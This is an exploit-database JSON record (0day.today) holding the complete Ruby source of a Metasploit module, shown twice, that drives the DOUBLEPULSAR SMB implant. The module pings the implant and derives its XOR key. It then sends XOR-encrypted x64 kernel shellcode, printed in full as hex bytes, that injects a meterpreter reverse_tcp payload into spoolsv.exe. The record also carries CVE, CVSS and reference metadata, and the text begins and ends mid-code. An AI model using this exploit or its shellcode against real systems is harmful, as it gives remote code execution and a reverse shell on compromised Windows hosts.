proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-27] #"}, "lastseen": "2021-10-26T22:27:57", "differentElements": ["sourceData"], "edition": 56}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "38a543fe4a0dd5826cab0c18f656906b", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-27T22:18:11", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:42031", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27786", 
"1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:142602"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}], "modified": "2021-10-27T22:18:11", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-10-27T22:18:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => 
true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
